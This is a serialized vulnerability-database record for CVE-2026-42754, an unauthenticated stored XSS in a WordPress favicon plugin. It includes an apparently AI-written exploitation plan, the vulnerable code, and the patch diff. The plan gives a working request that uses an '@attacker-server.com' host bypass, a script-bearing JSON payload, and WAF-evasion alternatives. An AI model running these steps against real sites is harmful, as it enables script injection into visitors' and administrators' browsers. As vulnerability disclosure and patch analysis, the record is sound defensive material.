[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fh5bfWbckW5T-Tzwd3gUnLi3xnDYzIVGv0qqzCXPvsAA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":20,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":36},"CVE-2026-42754","favicon-by-realfavicongenerator-unauthenticated-stored-cross-site-scripting","Favicon by RealFaviconGenerator \u003C= 1.3.46 - Unauthenticated Stored Cross-Site Scripting","The Favicon by RealFaviconGenerator plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.46 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","favicon-by-realfavicongenerator",null,"\u003C=1.3.46","1.3.47","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-30 00:00:00","2026-06-01 16:04:04",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd6e16234-ec7b-466f-bc11-e80e63dec49f?source=api-prod",3,[22,23,24,25],"README.txt","admin\u002Fclass-favicon-by-realfavicongenerator-admin.php","admin\u002Fviews\u002Fappearance.php","favicon-by-realfavicongenerator.php","researched",false,"# Exploitation Research Plan: CVE-2026-42754\n\nThis document provides a technical plan for a Proof-of-Concept (PoC) exploit against the **Favicon by RealFaviconGenerator** plugin (\u003C= 1.3.46).\n\n## 1. Vulnerability Summary\nThe plugin is vulnerable to **Unauthenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the `install_new_favicon` AJAX handler. This handler is registered with `wp_ajax_nopriv_`, meaning it is accessible to unauthenticated users. It fetches a JSON payload from a user-supplied URL, parses it, and stores the `html_code` property into the WordPress database without sufficient sanitization. This stored script is then executed in the context of any user (including administrators) viewing the favicon settings or the site's head section.\n\n## 2. Attack Vector Analysis\n- **Vulnerable AJAX Action:** `fbrfg_install_new_favicon` (derived from `Favicon_By_RealFaviconGenerator_Common::PLUGIN_PREFIX` + `install_new_favicon`).\n- **Endpoint:** `POST \u002Fwp-admin\u002Fadmin-ajax.php`\n- **Vulnerable Parameter:** `json_result_url`\n- **Authentication Required:** None (Unauthenticated).\n- **Preconditions:** The plugin must be active.\n\n## 3. Code Flow\n1. **Entry Point:** The plugin registers an unauthenticated AJAX hook in `admin\u002Fclass-favicon-by-realfavicongenerator-admin.php`:\n   ```php\n   add_action( 'wp_ajax_nopriv_' . Favicon_By_RealFaviconGenerator_Common::PLUGIN_PREFIX . '_install_new_favicon', array( $this, 'install_new_favicon' ) );\n   ```\n2. **Input Fetching:** In `install_new_favicon()`, the plugin retrieves `$_REQUEST['json_result_url']`.\n3. **URL Reconstruction (Bypass Logic):**\n   ```php\n   $url = 'https:\u002F\u002Frealfavicongenerator.net' . preg_replace( '\u002F^http:\\\u002F\\\u002F\u002F', '', esc_url_raw( $_REQUEST['json_result_url'] ) );\n   ```\n   An attacker can bypass the domain restriction using the `@` symbol (e.g., `json_result_url=@attacker.com\u002Fevil.json`), which forces the client to treat `realfavicongenerator.net` as a username and `attacker.com` as the actual host.\n4. **Data Retrieval:** The plugin calls `download_result_json($url)`, which uses `wp_remote_get()` to fetch the JSON from the attacker-controlled server.\n5. **Storage (Sink):** The plugin (in the truncated logic of `install_new_favicon`) extracts the `html_code` from the JSON response and stores it using `update_option()`.\n6. **Execution:** The stored HTML\u002FScript is rendered in the `\u003Chead>` section via the `admin_head` hook or frontend hooks registered in `Favicon_By_RealFaviconGenerator_Admin`.\n\n## 4. Nonce Acquisition Strategy\nAccording to the source code in `admin\u002Fclass-favicon-by-realfavicongenerator-admin.php`, the `install_new_favicon` function **does not** perform any nonce verification (`check_ajax_referer` or `wp_verify_nonce`) at the start of the function. Furthermore, it is registered as a `nopriv` action specifically to allow external callbacks.\n\n**Conclusion:** No nonce is required for this exploit.\n\n## 5. Exploitation Strategy\n\n### Step 1: Prepare the Malicious Payload\nHost a file named `exploit.json` on a server accessible to the WordPress instance.\n**Payload Content (`exploit.json`):**\n```json\n{\n  \"favicon_generation_result\": {\n    \"favicon\": {\n      \"html_code\": \"\u003Cscript>alert('CVE-2026-42754-Stored-XSS');\u003C\u002Fscript>\"\n    }\n  }\n}\n```\n\n### Step 2: Trigger the Vulnerability\nSend a request to the AJAX endpoint using the `http_request` tool.\n\n- **Method:** POST\n- **URL:** `http:\u002F\u002F[target-ip]\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:** \n  ```text\n  action=fbrfg_install_new_favicon&json_result_url=@attacker-server.com\u002Fexploit.json\n  ```\n\n### Step 3: Verify the Injection\nNavigate to the site's homepage or the admin dashboard. The script should execute.\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure `favicon-by-realfavicongenerator` version 1.3.46 is installed and active.\n2. **External Server:** The PoC agent must have a way to simulate an external server (e.g., using a mock endpoint or an internal listener).\n\n## 7. Expected Results\n- The AJAX request should return a `200 OK` or a JSON success message (or a 500\u002Ferror if the later part of the function fails, but the storage usually happens early).\n- The WordPress option `fbrfg_favicon_markups` (inferred name) will now contain the `\u003Cscript>` tag.\n- Upon visiting the homepage, the browser should trigger the `alert()`.\n\n## 8. Verification Steps\nAfter executing the HTTP request, verify the database state using WP-CLI:\n```bash\n# Check if the malicious payload is stored in options\nwp option get fbrfg_favicon_markups\n```\n*(Note: The exact option name might be `fbrfg_favicon_markups` or `favicon_by_realfavicongenerator_settings`. Check the `public\u002Fclass-favicon-by-realfavicongenerator-common.php` if available to confirm).*\n\n## 9. Alternative Approaches\nIf the `@` symbol bypass is filtered by the server's cURL configuration:\n1. **Open Redirect:** If `realfavicongenerator.net` has an open redirect, use `json_result_url=\u002Fredirect?url=http:\u002F\u002Fattacker.com\u002Fexploit.json`.\n2. **Parameter Injection:** Try passing `json_result_url` as a full URL if `esc_url_raw` fails to prepend the domain under certain PHP configurations.\n3. **Double Encoding:** Try double-encoding the `@` or path characters if a WAF is present.","The Favicon by RealFaviconGenerator plugin for WordPress is vulnerable to unauthenticated stored Cross-Site Scripting (XSS) due to insufficient validation of the 'json_result_url' parameter in the 'install_new_favicon' AJAX handler. An attacker can use the '@' symbol bypass to trick the plugin into fetching a malicious JSON payload from an external server, which is then stored in the database and executed in the browser context of any user visiting the site.","\u002F\u002F admin\u002Fclass-favicon-by-realfavicongenerator-admin.php line 80\nadd_action(\n\t'wp_ajax_nopriv_' . Favicon_By_RealFaviconGenerator_Common::PLUGIN_PREFIX . '_install_new_favicon',\n\tarray( $this, 'install_new_favicon' )\n);\n\n---\n\n\u002F\u002F admin\u002Fclass-favicon-by-realfavicongenerator-admin.php line 186\npublic function install_new_favicon() {\n\theader( 'Content-type: application\u002Fjson' );\n\n\ttry {\n\t\t\u002F\u002F URL is explicitely decoded to compensate the extra encoding performed while generating the settings page\n\t\t$url = 'https:\u002F\u002Frealfavicongenerator.net' .\n\t\t  preg_replace( '\u002F^http:\\\u002F\\\u002F\u002F', '', esc_url_raw( $_REQUEST['json_result_url'] ) );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffavicon-by-realfavicongenerator\u002F1.3.46\u002Fadmin\u002Fclass-favicon-by-realfavicongenerator-admin.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffavicon-by-realfavicongenerator\u002F1.3.47\u002Fadmin\u002Fclass-favicon-by-realfavicongenerator-admin.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffavicon-by-realfavicongenerator\u002F1.3.46\u002Fadmin\u002Fclass-favicon-by-realfavicongenerator-admin.php\t2024-03-08 11:58:14.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffavicon-by-realfavicongenerator\u002F1.3.47\u002Fadmin\u002Fclass-favicon-by-realfavicongenerator-admin.php\t2026-05-09 07:22:12.000000000 +0000\n@@ -169,6 +169,33 @@\n \t\t'appearance.php';\n \t}\n \n+\tprivate function build_json_result_url() {\n+\t\t\u002F\u002F RFG is configured with path_only=true, so json_result_url is a path\n+\t\t\u002F\u002F like \u002Ffiles\u002F\u003Chash>\u002Fjson.json. We accept that, and also tolerate a\n+\t\t\u002F\u002F full URL provided the host is realfavicongenerator.net. Any other\n+\t\t\u002F\u002F host (including userinfo tricks like http:\u002F\u002F@attacker\u002Fpoc.json,\n+\t\t\u002F\u002F where realfavicongenerator.net would otherwise become the userinfo)\n+\t\t\u002F\u002F is rejected.\n+\t\t$raw   = esc_url_raw( wp_unslash( $_REQUEST['json_result_url'] ) );\n+\t\t$parts = wp_parse_url( $raw );\n+\t\tif ( ! is_array( $parts ) ) {\n+\t\t\tthrow new InvalidArgumentException( 'Invalid favicon result URL' );\n+\t\t}\n+\t\tif ( ! empty( $parts['host'] ) &&\n+\t\t\tstrtolower( $parts['host'] ) !== 'realfavicongenerator.net' ) {\n+\t\t\tthrow new InvalidArgumentException( 'Invalid favicon result URL' );\n+\t\t}\n+\t\tif ( ! empty( $parts['scheme'] ) &&\n+\t\t\t! in_array( strtolower( $parts['scheme'] ), array( 'http', 'https' ), true ) ) {\n+\t\t\tthrow new InvalidArgumentException( 'Invalid favicon result URL' );\n+\t\t}\n+\n+\t\t$path  = isset( $parts['path'] ) ? $parts['path'] : '\u002F';\n+\t\t$query = isset( $parts['query'] ) ? '?' . $parts['query'] : '';\n+\n+\t\treturn 'https:\u002F\u002Frealfavicongenerator.net' . $path . $query;\n+\t}\n+\n \tprivate function download_result_json( $url ) {\n \t\t$resp = wp_remote_get( $url );\n \t\tif ( is_wp_error( $resp ) ) {\n@@ -186,12 +213,21 @@\n \tpublic function install_new_favicon() {\n \t\theader( 'Content-type: application\u002Fjson' );\n \n+\t\t\u002F\u002F Verify the nonce BEFORE doing anything that touches the\n+\t\t\u002F\u002F json_result_url parameter. Otherwise an attacker who tricks\n+\t\t\u002F\u002F an admin into opening a crafted URL could trigger the SSRF\n+\t\t\u002F\u002F path and reflect attacker-controlled error messages.\n+\t\t$nonce = isset( $_REQUEST['_wpnonce'] ) ? $_REQUEST['_wpnonce'] : '';\n+\t\tif ( ! wp_verify_nonce( $nonce, self::NONCE_ACTION_NAME_FAVICON_GENERATION ) ) {\n+\t\t\techo wp_json_encode( array(\n+\t\t\t\t'status'  => 'error',\n+\t\t\t\t'message' => __( 'Nonce check failed', FBRFG_PLUGIN_SLUG ),\n+\t\t\t) );\n+\t\t\tdie();\n+\t\t}\n+\n \t\ttry {\n-\t\t\t\u002F\u002F URL is explicitely decoded to compensate the extra encoding performed while generating the settings page\n-\t\t\t$url = 'https:\u002F\u002Frealfavicongenerator.net' .\n-\t\t\t  preg_replace( '\u002F^http:\\\u002F\\\u002F\u002F', '', esc_url_raw( $_REQUEST['json_result_url'] ) );\n-\t\t\t\t\u002F\u002F esc_url_raw is used to sanitize the path. This functio adds a 'http:\u002F\u002F' prefix, which is then removed.\n-\t\t\t\t\u002F\u002F This code cannot be moved to a helper, as phpcs won't detect it and report an issue.\n+\t\t\t$url = $this->build_json_result_url();\n \n \t\t\t$result = $this->download_result_json( $url );","The exploit targets the unauthenticated AJAX endpoint 'wp-admin\u002Fadmin-ajax.php' with the action 'fbrfg_install_new_favicon'. An attacker provides a 'json_result_url' parameter starting with an '@' symbol (e.g., '@attacker.com\u002Fmalicious.json') to bypass the intended host restriction by exploiting how the URL is reconstructed. On the attacker's server, a JSON file is hosted with a 'favicon_generation_result' structure where the 'html_code' field contains a malicious JavaScript payload. The plugin fetches this JSON, parses it, and saves the malicious HTML into the WordPress database. This stored script is then rendered in the \u003Chead> section of all site pages, resulting in site-wide stored XSS.","gemini-3-flash-preview","2026-06-04 15:02:03","2026-06-04 15:03:13",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.3.46","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffavicon-by-realfavicongenerator\u002Ftags\u002F1.3.46","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffavicon-by-realfavicongenerator.1.3.46.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffavicon-by-realfavicongenerator\u002Ftags\u002F1.3.47","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffavicon-by-realfavicongenerator.1.3.47.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffavicon-by-realfavicongenerator\u002Ftags"]